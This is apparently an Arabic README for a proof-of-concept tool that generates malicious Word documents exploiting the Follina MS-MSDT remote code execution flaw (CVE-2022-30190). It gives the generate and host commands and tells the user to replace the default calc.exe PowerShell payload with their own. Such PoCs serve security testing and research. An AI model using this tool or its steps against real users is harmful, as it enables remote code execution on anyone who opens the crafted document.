
مولّد وثيقة PoC لـ MS-MSDT Follina CVE-2022-30190
مولد مستند docx خبيث لاستغلال ثغرة (تنفيذ تعليمات برمجية عن بعد في Microsoft Office Word)
تم إنشاء هذا السكريبت بناءً على CVE-2021-40444 PoC by LockedByte و شرح من Tothi
أولاً، قم بتعديل backup.html واستبدل حمولة PowerShell. في الوقت الحالي، يقوم فقط بتشغيل calc.exe باستخدام IEX('calc.exe').
python3 exploit.py generate http://<SRV IP>

بمجرد توليد مستند docx الخبيث (سيكون في out/)، يمكنك إعداد الخادم:
sudo python3 exploit.py host 80

أخيرًا، جرب مستند docx في جهاز افتراضي يعمل بنظام Windows:
